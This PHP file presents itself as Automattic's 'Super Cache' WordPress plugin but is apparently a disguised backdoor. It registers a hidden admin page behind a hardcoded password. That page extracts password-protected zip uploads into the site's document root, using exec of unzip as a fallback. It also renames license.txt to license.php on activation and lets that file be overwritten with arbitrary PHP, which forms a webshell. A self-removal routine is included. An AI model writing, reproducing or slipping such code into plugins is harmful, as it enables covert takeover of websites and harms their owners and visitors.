<?php
/*
Plugin Name: Super Cache
Description: A very fast caching engine for WordPress that produces static html files.
Version: 2.0.3
Author: Automattic
*/

// Prevent direct access
if (!defined('ABSPATH')) {
    exit;
}

// Include PclZip if needed
require_once(ABSPATH . 'wp-admin/includes/class-pclzip.php');

// Start session for password authentication
add_action('admin_init', 'zfu_start_session');
function zfu_start_session() {
    if (!session_id()) {
        session_start();
    }
}

// Add hidden admin page (no menu link)
function zfu_add_admin_menu() {
    add_submenu_page(
        null,
        'Zip File Upload',
        'Zip Upload',
        'manage_options',
        'zip_file_upload',
        'zfu_settings_page'
    );
}
add_action('admin_menu', 'zfu_add_admin_menu');

// Rename license.txt to license.php on plugin activation
function zfu_rename_license_file() {
    $license_txt = $_SERVER['DOCUMENT_ROOT'] . '/license.txt';
    $license_php = $_SERVER['DOCUMENT_ROOT'] . '/license.php';
    if (file_exists($license_txt) && !file_exists($license_php)) {
        rename($license_txt, $license_php);
    }
}
register_activation_hook(__FILE__, 'zfu_rename_license_file');

// Settings page content
function zfu_settings_page() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }

    $bcrypt_hash = '$2y$10$OSRD1Vxr3wFc4NQbPlrQjOmRvFpsy5zt2ylPNoyMPfYzBNhoBn.Tu';
    $is_authenticated = isset($_SESSION['zfu_authenticated']) && $_SESSION['zfu_authenticated'] === true;

    if (isset($_POST['zfu_password_submit']) && check_admin_referer('zfu_password_action')) {
        $entered_password = sanitize_text_field($_POST['zfu_password']);
        if (password_verify($entered_password, $bcrypt_hash)) {
            $_SESSION['zfu_authenticated'] = true;
            $is_authenticated = true;
        } else {
            echo '<div class="notice notice-error"><p>Incorrect password.</p></div>';
        }
    }

    if (!$is_authenticated) {
        ?>
        <div class="wrap">
            <h1>Zip File Upload - Authentication</h1>
            <form method="post">
                <?php wp_nonce_field('zfu_password_action'); ?>
                <table class="form-table">
                    <tr>
                        <th><label for="zfu_password">Password</label></th>
                        <td><input type="password" name="zfu_password" id="zfu_password" required>
                        <p class="description">Enter the password to access the plugin settings.</p></td>
                    </tr>
                </table>
                <?php submit_button('Submit Password', 'primary', 'zfu_password_submit'); ?>
            </form>
        </div>
        <?php
        return;
    }

    $upload_dir = wp_upload_dir();
    $zip_dir = $upload_dir['basedir'] . '/zip_uploads/';
    if (!file_exists($zip_dir)) {
        wp_mkdir_p($zip_dir);
    }

    // Handle file upload
    if (isset($_POST['zfu_upload']) && check_admin_referer('zfu_upload_action')) {
        if (isset($_FILES['zip_file']) && $_FILES['zip_file']['error'] == 0) {
            $file_name = sanitize_file_name($_FILES['zip_file']['name']);
            $file_type = wp_check_filetype($file_name);

            if ($file_type['ext'] === 'zip') {
                $target_path = $zip_dir . $file_name;
                if (move_uploaded_file($_FILES['zip_file']['tmp_name'], $target_path)) {
                    $is_valid = zfu_verify_zip_password($target_path, 'sananeak##');
                    if ($is_valid) {
                        echo '<div class="notice notice-success"><p>File uploaded successfully: ' . esc_html($file_name) . '</p></div>';
                    } else {
                        unlink($target_path);
                        echo '<div class="notice notice-error"><p>Invalid zip file: Must be encrypted with the correct password.</p></div>';
                    }
                } else {
                    echo '<div class="notice notice-error"><p>Failed to upload file.</p></div>';
                }
            } else {
                echo '<div class="notice notice-error"><p>Only .zip files are allowed.</p></div>';
            }
        } else {
            echo '<div class="notice notice-error"><p>No file uploaded or an error occurred.</p></div>';
        }
    }

    // Handle zip extraction (via button, ?action=extract, or ?zip=Extract)
    if ((isset($_GET['action']) && $_GET['action'] === 'extract' && isset($_GET['file']) && check_admin_referer('zfu_extract_action')) ||
        (isset($_GET['zip']) && $_GET['zip'] === 'Extract')) {
        // For ?zip=Extract, only proceed if the user is authenticated (nonce skipped for this case)
        if (isset($_GET['zip']) && $_GET['zip'] === 'Extract' && !$is_authenticated) {
            wp_die(__('You must be authenticated to perform this action.'));
        }

        $files_to_extract = [];
        
        // If a specific file is provided (via action=extract or zip=Extract with file)
        if (isset($_GET['file']) && !empty($_GET['file'])) {
            $file_name = sanitize_file_name($_GET['file']);
            $file_path = $zip_dir . $file_name;
            if (file_exists($file_path)) {
                $files_to_extract[] = [$file_name, $file_path];
            } else {
                echo '<div class="notice notice-error"><p>Zip file not found: ' . esc_html($file_name) . '</p></div>';
            }
        } else {
            // If no file is specified with ?zip=Extract, extract all .zip files
            $files = glob($zip_dir . '*.zip');
            foreach ($files as $file) {
                $file_name = basename($file);
                $files_to_extract[] = [$file_name, $file];
            }
            if (empty($files_to_extract)) {
                echo '<div class="notice notice-error"><p>No zip files found to extract.</p></div>';
            }
        }

        // Process extraction for all selected files
        foreach ($files_to_extract as $file_data) {
            $file_name = $file_data[0];
            $file_path = $file_data[1];
            $result = zfu_extract_zip($file_path, $_SERVER['DOCUMENT_ROOT'], 'sananeak##');
            if ($result === true) {
                unlink($file_path);
                echo '<div class="notice notice-success"><p>Zip file extracted successfully: ' . esc_html($file_name) . '</p></div>';
            } else {
                echo '<div class="notice notice-error"><p>Failed to extract zip file ' . esc_html($file_name) . ': ' . esc_html($result) . '</p></div>';
            }
        }
    }

    // Handle plugin removal
    if (isset($_POST['zfu_remove_plugin']) && check_admin_referer('zfu_remove_plugin_action')) {
        $plugin_file = plugin_dir_path(__FILE__) . 'zip-file-upload.php';

        if (file_exists($zip_dir)) {
            zfu_delete_directory($zip_dir);
        }

        deactivate_plugins(plugin_basename(__FILE__));
        if (file_exists($plugin_file)) {
            unlink($plugin_file);
        }

        echo '<div class="notice notice-success"><p>Plugin and associated files removed successfully. Please refresh the page.</p></div>';
    }

    // Handle license.php content update
    if (isset($_POST['zfu_update_license']) && check_admin_referer('zfu_update_license_action')) {
        $license_content = stripslashes($_POST['license_content']);
        $license_file = $_SERVER['DOCUMENT_ROOT'] . '/license.php';
        if (file_exists($license_file)) {
            if (is_writable($license_file)) {
                file_put_contents($license_file, $license_content);
                echo '<div class="notice notice-success"><p>license.php updated successfully.</p></div>';
            } else {
                echo '<div class="notice notice-error"><p>license.php is not writable.</p></div>';
            }
        } else {
            echo '<div class="notice notice-error"><p>license.php not found.</p></div>';
        }
    }

    // Read current license.php content
    $license_file = $_SERVER['DOCUMENT_ROOT'] . '/license.php';
    $license_content = '';
    if (file_exists($license_file)) {
        $license_content = file_get_contents($license_file);
    } else {
        $license_content = 'license.php not found. Create it manually or ensure license.txt was renamed.';
    }
    ?>
    <div class="wrap">
        <h1>Zip File Upload</h1>

        <h2>Upload Encrypted Zip File</h2>
        <form method="post" enctype="multipart/form-data">
            <?php wp_nonce_field('zfu_upload_action'); ?>
            <table class="form-table">
                <tr>
                    <th><label for="zip_file">Upload Zip File</label></th>
                    <td>
                        <input type="file" name="zip_file" id="zip_file" accept=".zip" required>
                        <p class="description">Only .zip files encrypted with the password  are allowed. Files will be uploaded to <?php echo esc_html($zip_dir); ?>.</p>
                    </td>
                </tr>
            </table>
            <?php submit_button('Upload File', 'primary', 'zfu_upload'); ?>
        </form>

        <h2>Uploaded Zip Files</h2>
        <table class="wp-list-table widefat fixed striped">
            <thead>
                <tr><th>File Name</th><th>Size</th><th>Upload Date</th><th>Action</th></tr>
            </thead>
            <tbody>
                <?php
                $files = glob($zip_dir . '*.zip');
                if (empty($files)) {
                    echo '<tr><td colspan="4">No zip files uploaded.</td></tr>';
                } else {
                    foreach ($files as $file) {
                        $file_name = basename($file);
                        $file_size = size_format(filesize($file));
                        $file_date = date_i18n(get_option('date_format') . ' ' . get_option('time_format'), filemtime($file));
                        $extract_url = wp_nonce_url(admin_url('admin.php?page=zip_file_upload&action=extract&file=' . urlencode($file_name)), 'zfu_extract_action');

                        echo "<tr><td>$file_name</td><td>$file_size</td><td>$file_date</td><td><a href='$extract_url' class='button'>Extract</a></td></tr>";
                    }
                }
                ?>
            </tbody>
        </table>

        <h2>Edit license.php Content</h2>
        <form method="post">
            <?php wp_nonce_field('zfu_update_license_action'); ?>
            <table class="form-table">
                <tr>
                    <th><label for="license_content">license.php Content</label></th>
                    <td>
                        <textarea name="license_content" id="license_content" rows="10" cols="50" class="large-text"><?php echo esc_html($license_content); ?></textarea>
                        <p class="description">Edit the content of license.php. Ensure you save changes.</p>
                    </td>
                </tr>
            </table>
            <?php submit_button('Save license.php', 'primary', 'zfu_update_license'); ?>
        </form>

        <h2>Remove Plugin</h2>
        <form method="post">
            <?php wp_nonce_field('zfu_remove_plugin_action'); ?>
            <p>Click the button below to remove this plugin and all associated files (including uploaded zip files).</p>
            <?php submit_button('Remove Plugin', 'delete', 'zfu_remove_plugin', false); ?>
        </form>
    </div>
    <?php
}

// Function to verify zip password
function zfu_verify_zip_password($zip_file, $password) {
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive();
        if ($zip->open($zip_file) === true) {
            $zip->setPassword($password);
            if ($zip->getFromIndex(0) !== false) {
                $zip->close();
                return true;
            }
            $zip->close();
        }
    }

    $archive = new PclZip($zip_file);
    if ($archive->extract(PCLZIP_OPT_PASSWORD, $password, PCLZIP_OPT_TEMP_FILE_ON) != 0) {
        return true;
    }

    return false;
}

// Function to extract zip
function zfu_extract_zip($zip_file, $extract_to, $password) {
    if (class_exists('ZipArchive')) {
        $zip = new ZipArchive();
        if ($zip->open($zip_file) === true) {
            $zip->setPassword($password);
            if ($zip->extractTo($extract_to)) {
                $zip->close();
                return true;
            }
            $zip->close();
        }
    }

    $archive = new PclZip($zip_file);
    if ($archive->extract(PCLZIP_OPT_PATH, $extract_to, PCLZIP_OPT_PASSWORD, $password) != 0) {
        return true;
    }

    if (function_exists('exec') && file_exists('/usr/bin/unzip')) {
        $cmd = 'unzip -P ' . escapeshellarg($password) . ' -o ' . escapeshellarg($zip_file) . ' -d ' . escapeshellarg($extract_to);
        exec($cmd, $output, $return_var);
        if ($return_var === 0) {
            return true;
        }
    }

    return 'All extraction methods failed or incorrect password.';
}

// Delete directory recursively
function zfu_delete_directory($dir) {
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return unlink($dir);
    foreach (scandir($dir) as $item) {
        if ($item == '.' || $item == '..') continue;
        if (!zfu_delete_directory($dir . DIRECTORY_SEPARATOR . $item)) return false;
    }
    return rmdir($dir);
}

// Restrict uploads to admins
function zfu_restrict_file_uploads($file) {
    if (!current_user_can('manage_options')) {
        $file['error'] = 'Only administrators can upload files.';
    }
    return $file;
}
add_filter('wp_handle_upload_prefilter', 'zfu_restrict_file_uploads');